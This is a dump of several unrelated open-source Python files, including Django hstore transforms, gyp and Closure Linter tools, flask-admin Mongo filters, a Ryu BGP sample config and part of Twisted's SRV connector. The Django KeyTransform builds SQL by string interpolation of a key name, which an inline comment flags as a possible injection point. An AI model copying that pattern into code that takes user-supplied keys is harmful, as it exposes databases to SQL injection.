    def __init__(self, key_name, *args, **kwargs):
        super(KeyTransform, self).__init__(*args, **kwargs)
        self.key_name = key_name
    def as_sql(self, compiler, connection):
        lhs, params = compiler.compile(self.lhs)
        # NOTE(review): key_name is interpolated directly into the SQL
        # rather than passed as a parameter — presumably keys come from ORM
        # lookup names only; confirm no user-controlled keys reach here.
        return "%s -> '%s'" % (lhs, self.key_name), params
class KeyTransformFactory(object):
    """Callable that builds KeyTransform instances bound to one key name."""
    def __init__(self, key_name):
        self.key_name = key_name
    def __call__(self, *args, **kwargs):
        return KeyTransform(self.key_name, *args, **kwargs)
@HStoreField.register_lookup
class KeysTransform(Transform):
    """Transform returning all hstore keys via the ``akeys()`` function."""
    lookup_name = 'keys'
    output_field = ArrayField(TextField())
    def as_sql(self, compiler, connection):
        lhs, params = compiler.compile(self.lhs)
        return 'akeys(%s)' % lhs, params
@HStoreField.register_lookup
class ValuesTransform(Transform):
    """Transform returning all hstore values via the ``avals()`` function."""
    lookup_name = 'values'
    output_field = ArrayField(TextField())
    def as_sql(self, compiler, connection):
        lhs, params = compiler.compile(self.lhs)
        return 'avals(%s)' % lhs, params
| bsd-3-clause |
allenlavoie/tensorflow | tensorflow/contrib/specs/python/__init__.py | 43 | 1255 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Init file, giving convenient access to all specs ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import,g-importing-member,redefined-builtin
from tensorflow.contrib.specs.python.params_ops import *
from tensorflow.contrib.specs.python.specs import *
from tensorflow.contrib.specs.python.specs_lib import *
from tensorflow.contrib.specs.python.specs_ops import *
from tensorflow.contrib.specs.python.summaries import *
# pylint: enable=wildcard-import,redefined-builtin
| apache-2.0 |
youprofit/django-cms | cms/models/placeholderpluginmodel.py | 49 | 1244 | # -*- coding: utf-8 -*-
from cms.models import CMSPlugin
from cms.models.fields import PlaceholderField
from cms.utils.copy_plugins import copy_plugins_to
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class PlaceholderReference(CMSPlugin):
    """Plugin pointing at another placeholder (backs the CMS clipboard)."""
    name = models.CharField(max_length=255)
    # Placeholder holding the referenced plugins (fixed 'clipboard' slot).
    placeholder_ref = PlaceholderField(slotname='clipboard')
    class Meta:
        app_label = 'cms'
    def __str__(self):
        return self.name
    def copy_to(self, placeholder, language):
        """Copy the referenced plugins into *placeholder* under *language*."""
        copy_plugins_to(self.placeholder_ref.get_plugins(), placeholder, to_language=language)
    def copy_from(self, placeholder, language):
        """Copy plugins of *language* from *placeholder* into this reference."""
        copy_plugins_to(placeholder.get_plugins(language), self.placeholder_ref, to_language=self.language)
    def move_to(self, placeholder, language):
        """Reassign the referenced plugins to *placeholder*/*language* in place."""
        for plugin in self.placeholder_ref.get_plugins():
            plugin.placeholder = placeholder
            plugin.language = language
            plugin.save()
    def move_from(self, placeholder, language):
        """Reassign all plugins of *placeholder* into this reference in place."""
        for plugin in placeholder.get_plugins():
            plugin.placeholder = self.placeholder_ref
            plugin.language = language
            plugin.save()
| bsd-3-clause |
webprogrammingunpas/pemogramanweb-theme | master/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/tools/pretty_sln.py | 1831 | 5099 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import re
import sys
import pretty_vcproj
def BuildProject(project, built, projects, deps):
  """Emit a build order for |project|, building its dependencies first.

  Recursively visits the dependencies of |project| depth-first, printing
  each project name the first time it becomes buildable and appending it
  to |built|.

  Args:
    project: name of the project to build.
    built: list of project names already emitted; mutated in place.
    projects: mapping of project name to project info (unused here; kept
      for interface compatibility with callers).
    deps: mapping of project name to the list of its dependency names.

  Note: this is not infinite-recursion proof; a dependency cycle will
  overflow the stack.
  """
  # If all dependencies are done we can build this project; otherwise
  # build each unbuilt dependency first.
  for dep in deps[project]:
    if dep not in built:
      BuildProject(dep, built, projects, deps)
  # print as a function call so the script also runs under Python 3.
  print(project)
  built.append(project)
def ParseSolution(solution_file):
  """Parse a Visual Studio .sln file.

  Args:
    solution_file: path to the .sln file.

  Returns:
    A (projects, dependencies) tuple where projects maps a project name to
    [path, clsid, original path] (with "_gyp" stripped from names/paths to
    ease diffing) and dependencies maps a project name to the sorted list
    of the names of the projects it depends on.
  """
  # All projects, their clsid and paths.
  projects = dict()
  # A list of dependencies associated with a project.
  dependencies = dict()
  # Regular expressions that match the SLN format.
  # The first line of a project definition.
  begin_project = re.compile(r'^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
                             r'}"\) = "(.*)", "(.*)", "(.*)"$')
  # The last line of a project definition.
  end_project = re.compile('^EndProject$')
  # The first line of a dependency list.
  begin_dep = re.compile(
      r'ProjectSection\(ProjectDependencies\) = postProject$')
  # The last line of a dependency list.
  end_dep = re.compile('EndProjectSection$')
  # A line describing a dependency.
  dep_line = re.compile(' *({.*}) = ({.*})$')

  in_deps = False
  # Initialized up front so a malformed file whose first matching line is a
  # dependency line cannot raise NameError.
  current_project = None
  # Context manager guarantees the handle is closed (the previous code
  # leaked the open file object).
  with open(solution_file) as solution:
    for line in solution:
      results = begin_project.search(line)
      if results:
        # Hack to remove icu because the diff is too different.
        if results.group(1).find('icu') != -1:
          continue
        # We remove "_gyp" from the names because it helps to diff them.
        current_project = results.group(1).replace('_gyp', '')
        projects[current_project] = [results.group(2).replace('_gyp', ''),
                                     results.group(3),
                                     results.group(2)]
        dependencies[current_project] = []
        continue

      results = end_project.search(line)
      if results:
        current_project = None
        continue

      results = begin_dep.search(line)
      if results:
        in_deps = True
        continue

      results = end_dep.search(line)
      if results:
        in_deps = False
        continue

      results = dep_line.search(line)
      if results and in_deps and current_project:
        dependencies[current_project].append(results.group(1))
        continue

  # Change all dependencies clsid to name instead.
  for project in dependencies:
    # For each dependency of this project, look for the project name
    # matching its clsid.
    new_dep_array = []
    for dep in dependencies[project]:
      for project_info in projects:
        if projects[project_info][1] == dep:
          new_dep_array.append(project_info)
    dependencies[project] = sorted(new_dep_array)

  return (projects, dependencies)
def PrintDependencies(projects, deps):
  """Print each project's path and dependency list, sorted by name.

  Args:
    projects: mapping of project name to [path, clsid, original path].
    deps: mapping of project name to a list of dependency names.
  """
  print("---------------------------------------")
  print("Dependencies for all projects")
  print("---------------------------------------")
  print("-- --")

  for (project, dep_list) in sorted(deps.items()):
    # print() calls keep the script runnable under both Python 2 and 3.
    print("Project : %s" % project)
    print("Path : %s" % projects[project][0])
    if dep_list:
      for dep in dep_list:
        print(" - %s" % dep)
    print("")

  print("-- --")
def PrintBuildOrder(projects, deps):
  """Print one possible dependency-respecting build order.

  Delegates to BuildProject, which prints each project once all of its
  dependencies have been emitted.
  """
  print("---------------------------------------")
  print("Build order ")
  print("---------------------------------------")
  print("-- --")

  built = []
  for (project, _) in sorted(deps.items()):
    if project not in built:
      BuildProject(project, built, projects, deps)

  print("-- --")
def PrintVCProj(projects):
  """Pretty-print every project's .vcproj file via the pretty_vcproj tool.

  For each project a banner is printed, then pretty_vcproj.main is invoked
  on the project path (resolved relative to the .sln given in sys.argv[1]),
  forwarding any extra command-line arguments from sys.argv[3:].
  """
  for project in projects:
    print("-------------------------------------")
    print("-------------------------------------")
    # The project name is repeated to make it stand out in the output.
    print(project)
    print(project)
    print(project)
    print("-------------------------------------")
    print("-------------------------------------")

    project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
                                                projects[project][2]))

    pretty = pretty_vcproj
    argv = ['',
            project_path,
            '$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1])]
    argv.extend(sys.argv[3:])
    pretty.main(argv)
def main():
  """Entry point: parse the .sln from the command line and report on it.

  Returns 0 on success, 1 when no solution file was supplied.
  """
  # Check that we got the mandatory .sln path parameter.
  if len(sys.argv) < 2:
    print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
    return 1

  (projects, deps) = ParseSolution(sys.argv[1])
  PrintDependencies(projects, deps)
  PrintBuildOrder(projects, deps)

  # Optionally also pretty-print every referenced vcproj file.
  if '--recursive' in sys.argv:
    PrintVCProj(projects)
  return 0
# Run the tool when invoked directly; exit status comes from main().
if __name__ == '__main__':
  sys.exit(main())
| apache-2.0 |
Bysmyyr/chromium-crosswalk | third_party/closure_linter/closure_linter/javascriptstatetracker_test.py | 127 | 7517 | #!/usr/bin/env python
#
# Copyright 2012 The Closure Linter Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the javascriptstatetracker module."""
# Allow non-Google copyright
# pylint: disable=g-bad-file-header
__author__ = ('nnaze@google.com (Nathan Naze)')
import unittest as googletest
from closure_linter import javascripttokens
from closure_linter import testutil
from closure_linter import tokenutil
_FUNCTION_SCRIPT = """\
var a = 3;
function foo(aaa, bbb, ccc) {
var b = 4;
}
/**
* JSDoc comment.
*/
var bar = function(ddd, eee, fff) {
};
/**
* Verify that nested functions get their proper parameters recorded.
*/
var baz = function(ggg, hhh, iii) {
var qux = function(jjj, kkk, lll) {
};
// make sure that entering a new block does not change baz' parameters.
{};
};
"""
class FunctionTest(googletest.TestCase):
  """Checks that the state tracker records functions in _FUNCTION_SCRIPT."""

  def testFunctionParse(self):
    """Verifies name, parameters, token range and JSDoc for all 4 functions."""
    functions, _ = testutil.ParseFunctionsAndComments(_FUNCTION_SCRIPT)
    self.assertEquals(4, len(functions))

    # First function: top-level "function foo(...)" declaration.
    function = functions[0]
    self.assertEquals(['aaa', 'bbb', 'ccc'], function.parameters)
    start_token = function.start_token
    end_token = function.end_token
    self.assertEquals(
        javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
        function.start_token.type)
    self.assertEquals('function', start_token.string)
    # line_number is 1-based within the fixture; start_index is the column.
    self.assertEquals(3, start_token.line_number)
    self.assertEquals(0, start_token.start_index)
    self.assertEquals('}', end_token.string)
    self.assertEquals(5, end_token.line_number)
    self.assertEquals(0, end_token.start_index)
    self.assertEquals('foo', function.name)
    self.assertIsNone(function.doc)

    # Second function: anonymous function assigned to "bar", with JSDoc.
    function = functions[1]
    self.assertEquals(['ddd', 'eee', 'fff'], function.parameters)
    start_token = function.start_token
    end_token = function.end_token
    self.assertEquals(
        javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
        function.start_token.type)
    self.assertEquals('function', start_token.string)
    self.assertEquals(11, start_token.line_number)
    # Column 10: the "function" keyword follows "var bar = ".
    self.assertEquals(10, start_token.start_index)
    self.assertEquals('}', end_token.string)
    self.assertEquals(13, end_token.line_number)
    self.assertEquals(0, end_token.start_index)
    self.assertEquals('bar', function.name)
    self.assertIsNotNone(function.doc)

    # Check function JSDoc: only the comment tokens should make up the text.
    doc = function.doc
    doc_tokens = tokenutil.GetTokenRange(doc.start_token, doc.end_token)
    comment_type = javascripttokens.JavaScriptTokenType.COMMENT
    comment_tokens = filter(lambda t: t.type is comment_type, doc_tokens)
    self.assertEquals('JSDoc comment.',
                      tokenutil.TokensToString(comment_tokens).strip())

    # Third function: "baz", which contains a nested function.
    function = functions[2]
    self.assertEquals(['ggg', 'hhh', 'iii'], function.parameters)
    start_token = function.start_token
    end_token = function.end_token
    self.assertEquals(
        javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
        function.start_token.type)
    self.assertEquals('function', start_token.string)
    self.assertEquals(19, start_token.line_number)
    self.assertEquals(10, start_token.start_index)
    self.assertEquals('}', end_token.string)
    self.assertEquals(24, end_token.line_number)
    self.assertEquals(0, end_token.start_index)
    self.assertEquals('baz', function.name)
    self.assertIsNotNone(function.doc)

    # Fourth function (inside third function): nested "qux" must keep its own
    # parameter list, distinct from baz's.
    function = functions[3]
    self.assertEquals(['jjj', 'kkk', 'lll'], function.parameters)
    start_token = function.start_token
    end_token = function.end_token
    self.assertEquals(
        javascripttokens.JavaScriptTokenType.FUNCTION_DECLARATION,
        function.start_token.type)
    self.assertEquals('function', start_token.string)
    self.assertEquals(20, start_token.line_number)
    self.assertEquals(12, start_token.start_index)
    self.assertEquals('}', end_token.string)
    self.assertEquals(21, end_token.line_number)
    self.assertEquals(2, end_token.start_index)
    self.assertEquals('qux', function.name)
    self.assertIsNone(function.doc)
class CommentTest(googletest.TestCase):
  """Checks comment parsing: description extraction and target resolution."""

  def testGetDescription(self):
    """The description excludes the @param block and preserves paragraphs."""
    comment = self._ParseComment("""
        /**
         * Comment targeting goog.foo.
         *
         * This is the second line.
         * @param {number} foo The count of foo.
         */
        target;""")

    self.assertEqual(
        'Comment targeting goog.foo.\n\nThis is the second line.',
        comment.description)

  def testCommentGetTarget(self):
    """GetTargetIdentifier must find the symbol a comment documents."""
    # Simple assignment.
    self.assertCommentTarget('goog.foo', """
        /**
         * Comment targeting goog.foo.
         */
        goog.foo = 6;
        """)

    # var declaration.
    self.assertCommentTarget('bar', """
        /**
         * Comment targeting bar.
         */
        var bar = "Karate!";
        """)

    # Function declaration.
    self.assertCommentTarget('doThing', """
        /**
         * Comment targeting doThing.
         */
        function doThing() {};
        """)

    # Property assignment inside a constructor body.
    self.assertCommentTarget('this.targetProperty', """
        goog.bar.Baz = function() {
          /**
           * Comment targeting targetProperty.
           */
          this.targetProperty = 3;
        };
        """)

    # Bare property reference (no assignment).
    self.assertCommentTarget('goog.bar.prop', """
        /**
         * Comment targeting goog.bar.prop.
         */
        goog.bar.prop;
        """)

    # Parenthesized reference.
    self.assertCommentTarget('goog.aaa.bbb', """
        /**
         * Comment targeting goog.aaa.bbb.
         */
        (goog.aaa.bbb)
        """)

    self.assertCommentTarget('theTarget', """
        /**
         * Comment targeting symbol preceded by newlines, whitespace,
         * and parens -- things we ignore.
         */
        (theTarget)
        """)

    # @fileoverview comments have no target.
    self.assertCommentTarget(None, """
        /**
         * @fileoverview File overview.
         */
        (notATarget)
        """)

    # A trailing comment with nothing after it has no target.
    self.assertCommentTarget(None, """
        /**
         * Comment that doesn't find a target.
         */
        """)

    # Dotted identifiers may be split across lines (dot leading or trailing).
    self.assertCommentTarget('theTarget.is.split.across.lines', """
        /**
         * Comment that addresses a symbol split across lines.
         */
        (theTarget.is.split
            .across.lines)
        """)

    self.assertCommentTarget('theTarget.is.split.across.lines', """
        /**
         * Comment that addresses a symbol split across lines.
         */
        (theTarget.is.split.
            across.lines)
        """)

  def _ParseComment(self, script):
    """Parse a script that contains one comment and return it."""
    _, comments = testutil.ParseFunctionsAndComments(script)
    self.assertEquals(1, len(comments))
    return comments[0]

  def assertCommentTarget(self, target, script):
    """Asserts the single comment in *script* resolves to *target*."""
    comment = self._ParseComment(script)
    self.assertEquals(target, comment.GetTargetIdentifier())


if __name__ == '__main__':
  googletest.main()
| bsd-3-clause |
kohnle-lernmodule/KITexe201based | exe/engine/version.py | 2 | 2041 | #!/usr/bin/python
# ===========================================================================
# eXe
# Copyright 2004-2006 University of Auckland
# Copyright 2004-2008 eXe Project, http://eXeLearning.org/
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ===========================================================================
"""
Version Information
"""
# Static project/version identification; ``version`` is the value other
# modules import.  ``revision`` combines the two revision components as
# "<intef>-<lernmodule>".  (Python 2 module: note the print statement below.)
project = "KIC.InnoEnergy"
release = "2.0.1"
revisionIntef = "dd27f4d"
revisionLernmodule = "KIC-2"
revision = revisionIntef+"-"+revisionLernmodule
version = release
pkg_version = None
# The disabled block below is the former auto-detection of release/revision
# (debian changelog, pkg_resources, git); kept for reference.
#try:
# line = open('debian/changelog').readline()
# release = line.split(':')[1].split(')')[0]
#except:
# try:
# import pkg_resources
# pkg_version = pkg_resources.require(project)[0].version
# release = pkg_version[0:-42]
# except:
# import sys
# if sys.platform[:3] == "win":
# pkg_version = open(sys.prefix + '/version').readline()
# release = pkg_version[0:-42]
# else:
# pkg_version = open('../Resources/exe/version').readline()
# release = pkg_version[0:-42]
#try:
# import git
#
# repo = git.Repo()
# revision = repo.head.commit.hexsha
#except:
# revision = pkg_version[-40:] if pkg_version else ''
#version = release + "-r" + revision if revision else release
if __name__ == '__main__':
    # Python 2 print statement: emits "<project> <version>".
    print project, version
| gpl-2.0 |
ibushong/test-repo | flask_admin/contrib/pymongo/filters.py | 7 | 2535 | import re
from flask.ext.admin.babel import gettext
from flask.ext.admin.model import filters
from .tools import parse_like_term
class BasePyMongoFilter(filters.BaseFilter):
    """
    Base pymongo filter.

    Subclasses implement ``apply(query, value)``, which appends a mongo
    condition dict to *query* (a list of conditions) and returns it, and
    ``operation()``, which returns the human-readable operator name.
    """
    def __init__(self, column, name, options=None, data_type=None):
        """
        Constructor.

        :param column:
            Document field name
        :param name:
            Display name
        :param options:
            Fixed set of options
        :param data_type:
            Client data type
        """
        super(BasePyMongoFilter, self).__init__(name, options, data_type)

        # Remember which document field this filter targets.
        self.column = column
# Common filters
class FilterEqual(BasePyMongoFilter):
    """Match documents whose field equals the given value exactly."""

    def apply(self, query, value):
        query.append({self.column: value})
        return query

    def operation(self):
        return gettext('equals')
class FilterNotEqual(BasePyMongoFilter):
    """Match documents whose field differs from the given value ($ne)."""

    def apply(self, query, value):
        query.append({self.column: {'$ne': value}})
        return query

    def operation(self):
        return gettext('not equal')
class FilterLike(BasePyMongoFilter):
    """Substring match using a regex derived from the search term."""

    def apply(self, query, value):
        # parse_like_term translates SQL-LIKE style input into a regex string.
        regex = parse_like_term(value)
        query.append({self.column: {'$regex': regex}})
        return query

    def operation(self):
        return gettext('contains')
class FilterNotLike(BasePyMongoFilter):
    """Negated substring match."""

    def apply(self, query, value):
        regex = parse_like_term(value)
        # $not requires a compiled pattern (a plain string would be taken
        # as a literal), unlike $regex above.
        query.append({self.column: {'$not': re.compile(regex)}})
        return query

    def operation(self):
        return gettext('not contains')
class FilterGreater(BasePyMongoFilter):
    """Match documents whose numeric field is strictly greater ($gt)."""

    def apply(self, query, value):
        try:
            threshold = float(value)
        except ValueError:
            # Non-numeric input degrades to 0 (best-effort, as before).
            threshold = 0
        query.append({self.column: {'$gt': threshold}})
        return query

    def operation(self):
        return gettext('greater than')
class FilterSmaller(BasePyMongoFilter):
    """Match documents whose numeric field is strictly smaller ($lt)."""

    def apply(self, query, value):
        try:
            threshold = float(value)
        except ValueError:
            # Non-numeric input degrades to 0 (best-effort, as before).
            threshold = 0
        query.append({self.column: {'$lt': threshold}})
        return query

    def operation(self):
        return gettext('smaller than')
# Customized type filters
class BooleanEqualFilter(FilterEqual, filters.BaseBooleanFilter):
    """Equality filter for boolean fields."""

    def clean(self, value):
        # Presumably the client submits '1' for True and '0' for False --
        # confirm against the filter widget.
        return value == '1'
class BooleanNotEqualFilter(FilterNotEqual, filters.BaseBooleanFilter):
    """Inequality filter for boolean fields."""

    def clean(self, value):
        # Same '1'/'0' encoding as BooleanEqualFilter.
        return value == '1'
| bsd-3-clause |
ariloulaleelay/wrflow | wrflow/model/dag.py | 1 | 4111 | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, DateTime, Integer, Boolean
from sqlalchemy import orm
from json import loads as json_loads
from json import dumps as json_dumps
from wrflow.common import hash_dict, hash_list
Base = declarative_base()
__all__ = [
'Node',
'Edge',
]
class Node(Base):
    """A DAG node persisted in the ``nodes`` table.

    A node is identified by the hash of its ``params`` dict (``id``);
    ``demand`` and ``satisfied`` track scheduling state, and ``edges`` links
    to the edges this node participates in.  (Python 2 module: ``iteritems``.)
    """
    __tablename__ = 'nodes'

    id = Column(String, primary_key=True)            # hash_dict(params)
    params_string = Column(String, nullable=False)   # JSON-serialised params
    demand = Column(Integer, nullable=False)
    satisfied = Column(Boolean, nullable=False)
    edges = orm.relationship("Edge")
    last_occurence = Column(DateTime, nullable=True)

    def __init__(self, params, demand=0, satisfied=False):
        # ``params`` is kept both as a live dict and as its JSON string for
        # persistence; __init_reconstruct rebuilds the dict on load.
        self.id = hash_dict(params)
        self.params = params
        self.params_string = json_dumps(self.params)
        self.demand = demand
        self.satisfied = satisfied
        self.last_occurence = None

    @classmethod
    def get_or_create(cls, params, session=None):
        """Return ``(node, created)`` for *params*, creating it if missing."""
        if session is None:
            # NOTE(review): falls back to querying on the class itself; this
            # only works if the class is bound to a query-capable registry
            # (e.g. Flask-SQLAlchemy) -- confirm.
            session = cls
        id = hash_dict(params)
        instance = session.query(cls).filter(cls.id == id).first()
        if instance:
            return instance, False
        instance = Node(params)
        session.add(instance)
        return instance, True

    @orm.reconstructor
    def __init_reconstruct(self):
        # Runs when SQLAlchemy loads the row: restore the params dict.
        self.params = json_loads(self.params_string)

    def is_sub_of(self, node):
        """True if *node*'s params are a subset of (agree with) ours."""
        for k, v in node.params.iteritems():
            if self.params.get(k, None) != v:
                return False
        return True

    def occured(self):
        # True once the node has been observed at least once.
        return self.last_occurence is not None

    def satisfy(self, session):
        """Mark this node satisfied, plus every unsatisfied superset node."""
        self.satisfied = True
        nodes = session.query(Node).filter(~Node.satisfied)
        for node in nodes:
            if self.is_sub_of(node):
                node.satisfied = True

    def add_demand(self, demand, session):
        """Propagate *demand* through all unsatisfied nodes reachable via edges."""
        seen_nodes = set()
        nodes = set()
        nodes.add(self)
        # Breadth-like traversal over the edge graph, skipping satisfied nodes.
        while len(nodes) > 0:
            node = nodes.pop()
            node.demand += demand
            seen_nodes.add(node)
            for edge in node.edges:
                for subnode in edge.nodes:
                    if subnode in seen_nodes:
                        continue
                    if subnode.satisfied:
                        continue
                    nodes.add(subnode)
        for node in seen_nodes:
            # NOTE(review): Node defines no save() method and plain
            # SQLAlchemy models have none -- this looks like it would raise
            # AttributeError at runtime; confirm intent (session.commit?).
            node.save()

    def __eq__(self, that):
        return self.id == that.id

    def __hash__(self):
        return hash(self.id)
class Edge(Base):
    """An edge in the DAG, tying a task class to the set of nodes it touches.

    ``id`` is deterministic: "<module.Class>:<hash of sorted node ids>", so
    the same (task, nodes) pair always maps to the same row.
    """
    __tablename__ = 'edges'

    id = Column(String, primary_key=True)
    task_class_string = Column(String, nullable=False)  # "module.ClassName"
    nodes = orm.relationship("Node")

    def __init__(self, task_class, nodes):
        self.task_class = task_class
        self.task_class_string = self.task_class.__module__ + '.' + self.task_class.__name__
        self.id = self._generate_id(task_class, nodes)
        for node in nodes:
            self.nodes.append(node)

    @orm.reconstructor
    def __init_reconstruct(self):
        # On load, re-import the task class from its dotted-path string.
        module_name, class_name = self.task_class_string.rsplit('.', 1)
        module = __import__(module_name, fromlist=[class_name])
        self.task_class = getattr(module, class_name)

    @classmethod
    def _generate_id(cls, task_class, nodes):
        # Sorting the node ids makes the id independent of node order.
        task_class_string = task_class.__module__ + '.' + task_class.__name__
        id = task_class_string + ':' + hash_list(sorted(map(lambda x: x.id, nodes)))
        return id

    # NOTE(review): __eq__ is defined without __hash__; on Python 3 this
    # makes Edge unhashable, and even on Python 2 the default identity hash
    # is inconsistent with this equality -- confirm whether edges are ever
    # used in sets/dict keys.
    def __eq__(self, that):
        return self.id == that.id

    @classmethod
    def get_or_create(cls, task_class, nodes, session):
        """Return ``(edge, created)`` for the (task_class, nodes) pair."""
        id = cls._generate_id(task_class, nodes)
        instance = session.query(cls).filter(cls.id == id).first()
        if instance:
            return instance, False
        instance = cls(task_class, nodes)
        session.add(instance)
        return instance, True

    @property
    def satisfied(self):
        # An edge is satisfied only when every attached node is satisfied.
        for node in self.nodes:
            if not node.satisfied:
                return False
        return True
| gpl-2.0 |
ntts-clo/mld-ryu | ryu/services/protocols/bgp/bgp_sample_conf.py | 3 | 3176 | import os
# =============================================================================
# BGP configuration.
# =============================================================================
# Static sample configuration read by the ryu BGP speaker service at startup.
BGP = {
    # General BGP configuration.
    'routing': {
        # ASN for this BGP instance.
        'local_as': 64512,
        # BGP Router ID.
        'router_id': '10.10.0.1',
        # We list all BGP neighbors below. We establish EBGP sessions with a
        # peer whose AS number differs from the one configured above. We will
        # establish an IBGP session if the AS number is the same.
        'bgp_neighbors': {
            '10.0.0.1': {
                'remote_as': 64513,
                # MED value advertised to this eBGP peer.
                'multi_exit_disc': 100
            },
            '10.10.0.2': {
                'remote_as': 64514,
            },
        },
        # Prefixes originated (advertised) by this speaker.
        'networks': [
            '10.20.0.0/24',
            '10.30.0.0/24',
            '10.40.0.0/16',
            '10.50.0.0/16',
        ],
    },
}
# =============================================================================
# Logging configuration.
# =============================================================================
# ``logging.config.dictConfig``-style configuration.  Console logging is on
# by default; the file handlers rotate their files at 10 MB.
LOGGING = {
    # We use python logging package for logging.
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s ' +
                      '[%(process)d %(thread)d] %(message)s'
        },
        'simple': {
            'format': '%(levelname)s %(asctime)s %(module)s %(lineno)s ' +
                      '%(message)s'
        },
        'stats': {
            'format': '%(message)s'
        },
    },
    'handlers': {
        # Outputs log to console.
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        },
        'console_stats': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'stats'
        },
        # Rotates log file when its size reaches 10MB.
        # NOTE: maxBytes must be an int; the original sample passed the
        # string '10000000', which effectively disabled rotation.
        'log_file': {
            'level': 'ERROR',
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': os.path.join('.', 'bgpspeaker.log'),
            'maxBytes': 10000000,
            'formatter': 'verbose'
        },
        'stats_file': {
            'level': 'DEBUG',
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': os.path.join('.', 'statistics_bgps.log'),
            'maxBytes': 10000000,
            'formatter': 'stats'
        },
    },
    # Fine-grained control of logging per instance.
    'loggers': {
        'bgpspeaker': {
            # The original dict listed 'handlers' twice; Python keeps only
            # the last duplicate key, so the effective value was ['console'].
            # The redundant first entry has been removed.  Add 'log_file'
            # here to also log errors to file.
            'handlers': ['console'],
            'level': 'DEBUG',
            'propagate': False,
        },
        'stats': {
            'handlers': ['stats_file', 'console_stats'],
            'level': 'INFO',
            'propagate': False,
            # (An invalid 'formatter' key, ignored by dictConfig, was
            # removed here; formatters belong on handlers.)
        },
    },
    # Root loggers.
    'root': {
        'handlers': ['console', 'log_file'],
        'level': 'DEBUG',
        'propagate': True,
    },
}
| apache-2.0 |
evensonbryan/yocto-autobuilder | lib/python2.7/site-packages/Twisted-12.2.0-py2.7-linux-x86_64.egg/twisted/names/srvconnect.py | 7 | 7383 | # -*- test-case-name: twisted.names.test.test_srvconnect -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import random
from zope.interface import implements
from twisted.internet import error, interfaces
from twisted.names import client, dns
from twisted.names.error import DNSNameError
from twisted.python.compat import reduce
class _SRVConnector_ClientFactoryWrapper:
    """Proxy around a client factory that substitutes the SRVConnector.

    Connection callbacks receive the SRVConnector instead of the low-level
    TCP connector, so retries go back through SRV server selection.  All
    other attribute access is delegated to the wrapped factory.
    """
    def __init__(self, connector, wrappedFactory):
        self.__connector = connector
        self.__wrappedFactory = wrappedFactory

    def startedConnecting(self, connector):
        # Report the SRVConnector, not the transport-level connector.
        self.__wrappedFactory.startedConnecting(self.__connector)

    def clientConnectionFailed(self, connector, reason):
        self.__connector.connectionFailed(reason)

    def clientConnectionLost(self, connector, reason):
        self.__connector.connectionLost(reason)

    def __getattr__(self, key):
        # Delegate everything else to the real factory.
        return getattr(self.__wrappedFactory, key)
class SRVConnector:
    """A connector that looks up DNS SRV records. See RFC2782.

    (Python 2 module: uses tuple-unpacking parameters, ``cmp``, ``xrange``
    and the statement form of ``raise``.)
    """
    implements(interfaces.IConnector)

    # When set, a DNS lookup in flight completes without opening a
    # connection (used by stopConnecting before the lookup returns).
    stopAfterDNS=0

    def __init__(self, reactor, service, domain, factory,
                 protocol='tcp', connectFuncName='connectTCP',
                 connectFuncArgs=(),
                 connectFuncKwArgs={},
                 defaultPort=None,
                 ):
        """
        @ivar defaultPort: Optional default port number to be used when SRV
            lookup fails and the service name is unknown. This should be the
            port number associated with the service name as defined by the IANA
            registry.
        @type defaultPort: C{int}
        """
        # NOTE(review): connectFuncKwArgs={} is a shared mutable default;
        # harmless only if no caller mutates it -- confirm.
        self.reactor = reactor
        self.service = service
        self.domain = domain
        self.factory = factory

        self.protocol = protocol
        self.connectFuncName = connectFuncName
        self.connectFuncArgs = connectFuncArgs
        self.connectFuncKwArgs = connectFuncKwArgs
        self._defaultPort = defaultPort

        self.connector = None
        self.servers = None
